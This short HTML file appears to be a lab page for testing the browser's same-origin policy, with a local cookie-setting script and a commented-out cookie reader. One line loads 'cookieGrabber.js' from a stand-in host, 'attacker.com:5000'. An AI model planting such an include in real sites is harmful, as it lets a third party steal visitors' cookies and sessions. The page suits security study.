<!DOCTYPE html>
<html>
<head>
	<title>Testing page for Same Origin Policy</title>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
</head>
<body>
	<div id='main_page'>
		This is the super domain of the website.
	</div>

	<script type="text/javascript" src='static/secondary.js'></script>
	<script type="text/javascript" src='static/cookieSetter.js'></script>
	<script type="text/javascript" src='http://attacker.com:5000/static/cookieGrabber.js'></script>
	<!-- <script type="text/javascript">
		function get_cookie ( cookie_name ) {
			var cookie_string = document.cookie ;
			if (cookie_string.length != 0) {
				var cookie_value = cookie_string.match ( '(^|;)[\s]*' + cookie_name + '=([^;]*)' );
				return decodeURIComponent ( cookie_value[2] ) ;
			}
			return '' ;
		} 

		console.log(get_cookie('testcookie'));
	</script> -->

	<script type="text/javascript"> 
		console.log('End of script');
	</script>

</body>
</html>